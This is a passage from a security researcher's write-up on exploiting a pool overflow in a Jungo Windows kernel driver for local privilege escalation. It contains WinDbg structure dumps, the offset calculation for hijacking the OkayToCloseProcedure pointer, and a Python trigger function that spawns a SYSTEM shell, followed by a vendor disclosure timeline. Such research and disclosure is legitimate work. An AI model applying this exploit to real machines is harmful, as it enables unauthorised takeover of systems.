Triggering Code Execution in the Kernel

Well, we survive execution after triggering our overflow, but in order to gain eop we need to place a pointer at 0x00000074 to leverage the OkayToCloseProcedure function pointer.

kd> dt nt!_OBJECT_TYPE name 84fc8040

+0x008 Name : _UNICODE_STRING "IoCompletionReserve"

kd> dt nt!_OBJECT_TYPE 84fc8040 .

+0x000 TypeList : [ 0x84fc8040 - 0x84fc8040 ]

+0x000 Flink : 0x84fc8040 _LIST_ENTRY [ 0x84fc8040 - 0x84fc8040 ]

+0x004 Blink : 0x84fc8040 _LIST_ENTRY [ 0x84fc8040 - 0x84fc8040 ]

+0x008 Name : "IoCompletionReserve"

+0x000 Length : 0x26

+0x002 MaximumLength : 0x28

+0x004 Buffer : 0x88c01090 "IoCompletionReserve"

+0x010 DefaultObject :

+0x014 Index : 0x0 '' <--- TypeIndex is 0x0

+0x018 TotalNumberOfObjects : 0x61a9

+0x01c TotalNumberOfHandles : 0x61a9

+0x020 HighWaterNumberOfObjects : 0x61a9

+0x024 HighWaterNumberOfHandles : 0x61a9

+0x028 TypeInfo : <-- TypeInfo is offset 0x28 from 0x0

+0x000 Length : 0x50

+0x002 ObjectTypeFlags : 0x2 ''

+0x002 CaseInsensitive : 0y0

+0x002 UnnamedObjectsOnly : 0y1

+0x002 UseDefaultObject : 0y0

+0x002 SecurityRequired : 0y0

+0x002 MaintainHandleCount : 0y0

+0x002 MaintainTypeList : 0y0

+0x002 SupportsObjectCallbacks : 0y0

+0x002 CacheAligned : 0y0

+0x004 ObjectTypeCode : 0

+0x008 InvalidAttributes : 0xb0

+0x00c GenericMapping : _GENERIC_MAPPING

+0x01c ValidAccessMask : 0xf0003

+0x020 RetainAccess : 0

+0x024 PoolType : 0 ( NonPagedPool )

+0x028 DefaultPagedPoolCharge : 0

+0x02c DefaultNonPagedPoolCharge : 0x5c

+0x030 DumpProcedure : (null)

+0x034 OpenProcedure : (null)

+0x038 CloseProcedure : (null)

+0x03c DeleteProcedure : (null)

+0x040 ParseProcedure : (null)

+0x044 SecurityProcedure : 0x82cb02ac long nt!SeDefaultObjectMethod+0

+0x048 QueryNameProcedure : (null)

+0x04c OkayToCloseProcedure : (null) <--- OkayToCloseProcedure is offset 0x4c from 0x0

+0x078 TypeLock :

+0x000 Locked : 0y0

+0x000 Waiting : 0y0

+0x000 Waking : 0y0

+0x000 MultipleShared : 0y0

+0x000 Shared : 0y0000000000000000000000000000 (0)

+0x000 Value : 0

+0x000 Ptr : (null)

+0x07c Key : 0x6f436f49

+0x080 CallbackList : [ 0x84fc80c0 - 0x84fc80c0 ]

+0x000 Flink : 0x84fc80c0 _LIST_ENTRY [ 0x84fc80c0 - 0x84fc80c0 ]

+0x004 Blink : 0x84fc80c0 _LIST_ENTRY [ 0x84fc80c0 - 0x84fc80c0 ]

So, 0x28 + 0x4c = 0x74, which is where our pointer needs to be. But how is the OkayToCloseProcedure called? It turns out that this is a registered aexit handler. So to trigger the execution of code, one just needs to free the corrupted IoCompletionReserve object. We don’t know which handle is associated with the overflown chunk, so we just free them all.

def trigger_lpe():
    """
    This function frees the IoCompletionReserve objects and this triggers the
    registered aexit, which is our controlled pointer to OkayToCloseProcedure.
    """
    # free the corrupted chunk to trigger OkayToCloseProcedure
    for k, v in khandlesd.iteritems():
        kernel32.CloseHandle(v)
    os.system("cmd.exe")



Obligatory, screenshot:

Timeline

- 2017-08-22 – Verified and sent to Jungo via {sales,first,security,info}@jungo.com.

- 2017-08-25 – No response from Jungo and two bounced emails.

- 2017-08-26 – Attempted a follow up with the vendor via website chat.

- 2017-08-26 – No response via the website chat.

- 2017-09-03 – Received an email from a Jungo representative stating that they are “looking into it”.

- 2017-09-03 – Requested a timeframe for patch development and warned of possible 0day release.

- 2017-09-06 – No response from Jungo.

- 2017-09-06 – Public 0day release of advisory.

Some people ask how long it takes me to develop exploits. Honestly, since the kernel is new to me, it took me a little longer than normal. For vulnerability analysis and exploitation of this bug, it took me 1.5 days (over the weekend) which is relatively slow for an older platform.

Conclusion

Any size chunk that is < 0x1000 can be exploited in this manner. As mentioned, this is not a new technique, but merely a variation to an already existing technique that I wouldn’t have discovered if I stuck to exploiting HEVD. Having said that, the ability to take a pre-existing vulnerable driver and develop exploitation techniques from it proves to be invaluable.

Kernel pool determinism is strong, simply because if you randomize more of the kernel, then the operating system takes a performance hit. The balance between security and performance has always been problematic and it isn’t always so clear unless you are dealing directly with the kernel.

References

- https://github.com/hacksysteam/HackSysExtremeVulnerableDriver

- http://www.fuzzysecurity.com/tutorials/expDev/20.html

- https://media.blackhat.com/bh-dc-11/Mandt/BlackHat_DC_2011_Mandt_kernelpool-Slides.pdf

- https://msdn.microsoft.com/en-us/library/windows/desktop/ms724485(v=vs.85).aspx

- https://www.exploit-db.com/exploits/34272

Shoutouts to bee13oy for the help! Here, you can find the advisory and the exploit.